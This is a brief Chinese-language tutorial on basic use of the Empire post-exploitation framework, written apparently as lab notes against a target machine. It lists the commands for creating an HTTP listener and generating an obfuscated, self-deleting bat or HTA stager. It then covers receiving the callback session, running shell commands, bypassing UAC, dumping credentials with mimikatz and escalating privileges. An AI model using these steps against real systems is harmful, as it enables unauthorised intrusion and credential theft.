empire的基礎操作
目錄
help 檢視幫助命令
listeners 檢視監聽器
uselistener xxx 使用監聽器模組
常用的監聽模組:http
按兩次tab鍵檢視能使用的監聽器模組
info 檢視引數資訊
設定引數
set Name xxx
set Host http://xxx
set Port xxx
執行:execute
main 返回主選單
這邊顯示目前有一個活躍的監聽器
usestagers xxx 使用stager模組
常用的模組:windows/hta、windows/launcher_bat
按兩次tab鍵檢視能使用的stager模組
info 檢視要設定的引數
set Listener xx 設定監聽器
set OutFile /var/www/html/launcher.bat 設定檔案生成路勁
delete 木馬執行完是否自動刪除
Obfuscate(混淆)
execute 執行
在靶機上雙擊bat檔案成功反彈會話
agents 切換到使用者列表
list 列出使用者
rename 修改使用者ID的名字
interact 進入到使用者互動介面
sysinfo 檢視系統資訊
sc 截圖
searchmodule 搜尋模組
shell + command 執行命令
spawn 遷移到新的使用者需要指定監聽器的名字
產生了一個新的會話
使用者清除:
kill agents | all
監聽器清除:
kill listener | all
bypassuac <listener> bypassuac繞過uac提權
可以看到產生了一個帶*的會話,提權成功使用者名稱前面會多一個*號
mimikatz 在擁有許可權後可以利用mimikatz獲取使用者賬號密碼
creds 以列表的形式顯示mimikatz獲取的賬號密碼
uac提權(需要手動確認)
searchmodule ask 搜尋ask模組
usemodule privesc/ask 使用privesc/ask模組
info 檢視所需引數
設定監聽器
run 執行
靶機彈出uac認證框
列表中產生新的管理員會話
